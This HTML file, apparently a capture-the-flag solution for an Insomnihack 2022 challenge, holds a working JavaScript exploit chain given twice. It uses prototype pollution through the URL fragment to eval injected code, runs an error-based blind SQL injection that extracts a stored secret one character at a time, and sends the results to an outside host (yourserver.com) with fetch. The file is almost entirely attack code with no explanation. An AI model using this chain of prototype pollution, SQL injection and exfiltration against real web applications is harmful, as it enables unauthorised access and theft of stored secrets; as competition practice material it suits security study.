kunte0/vault_insomnihack_22.html

## vault_insomnihack_22.html
<script>

payload = () => {
    const sendback = (msg) => {
        fetch(`https://yourserver.com/aaaaaaaa?xxxx=${msg}`, {mode: 'no-cors'})
    }

    async function oracle(pos, charCode, retries=3) {
        try {
            // bypass the SecurityPolicy check. It is checked after a potential error
            const query = `select 1 from dbo.Vault where username='secret' and secret_name='flag' and 1/(ascii(substring(secret_value,${pos},1))-${charCode})=1`;
            const r = await fetch(`/api/stats?username=${encodeURIComponent(`' union ${query};-- -`)}`);
            const j = await r.json();

            sendback(`${charCode}:${j.status}`);

            return j.status === 'NOK';
        } catch (error) {
            sendback(`error:${charCode}:${error}`);
            if (retries <= 0) {
                return false;
            } else {
                return oracle(pos, charCode, retries - 1);
            }
        }
    }

    const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
    const brute = async (pos) => {
        for (const char of alphabet) {
            if (await oracle(pos, char.charCodeAt(0))) {
                return char;
            }
        }
        return false;
    }

    async function exploit(flag='') {
        let last;
        while (true) {
            last = await brute(flag.length + 1);
            if (last === false) {
                return flag;
            } else {
                flag += last;
            }
            sendback(`flag:${flag}`);
        }
    }

    exploit('INS{')
}


// document.location = `http://localhost:5000/#page=secrets&__proto__[url][]=data:,eval($.query.get('payload'))//&__proto__[dataType]=script&payload=(${encodeURIComponent(payload.toString())})()`


document.location = `http://vault.insomnihack.ch:5000/#page=secrets&__proto__[url][]=data:,eval($.query.get('payload'))//&__proto__[dataType]=script&payload=(${encodeURIComponent(payload.toString())})()`


</script>
	<script>

	payload = () => {
	const sendback = (msg) => {
	fetch(`https://yourserver.com/aaaaaaaa?xxxx=${msg}`, {mode: 'no-cors'})
	}

	async function oracle(pos, charCode, retries=3) {
	try {
	// bypass the SecurityPolicy check. It is checked after a potential error
	const query = `select 1 from dbo.Vault where username='secret' and secret_name='flag' and 1/(ascii(substring(secret_value,${pos},1))-${charCode})=1`;
	const r = await fetch(`/api/stats?username=${encodeURIComponent(`' union ${query};-- -`)}`);
	const j = await r.json();

	sendback(`${charCode}:${j.status}`);

	return j.status === 'NOK';
	} catch (error) {
	sendback(`error:${charCode}:${error}`);
	if (retries <= 0) {
	return false;
	} else {
	return oracle(pos, charCode, retries - 1);
	}
	}
	}

	const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`\|~{'.split('');
	const brute = async (pos) => {
	for (const char of alphabet) {
	if (await oracle(pos, char.charCodeAt(0))) {
	return char;
	}
	}
	return false;
	}

	async function exploit(flag='') {
	let last;
	while (true) {
	last = await brute(flag.length + 1);
	if (last === false) {
	return flag;
	} else {
	flag += last;
	}
	sendback(`flag:${flag}`);
	}
	}

	exploit('INS{')
	}


	// document.location = `http://localhost:5000/#page=secrets&__proto__[url][]=data:,eval($.query.get('payload'))//&__proto__[dataType]=script&payload=(${encodeURIComponent(payload.toString())})()`


	document.location = `http://vault.insomnihack.ch:5000/#page=secrets&__proto__[url][]=data:,eval($.query.get('payload'))//&__proto__[dataType]=script&payload=(${encodeURIComponent(payload.toString())})()`


	</script>
No results found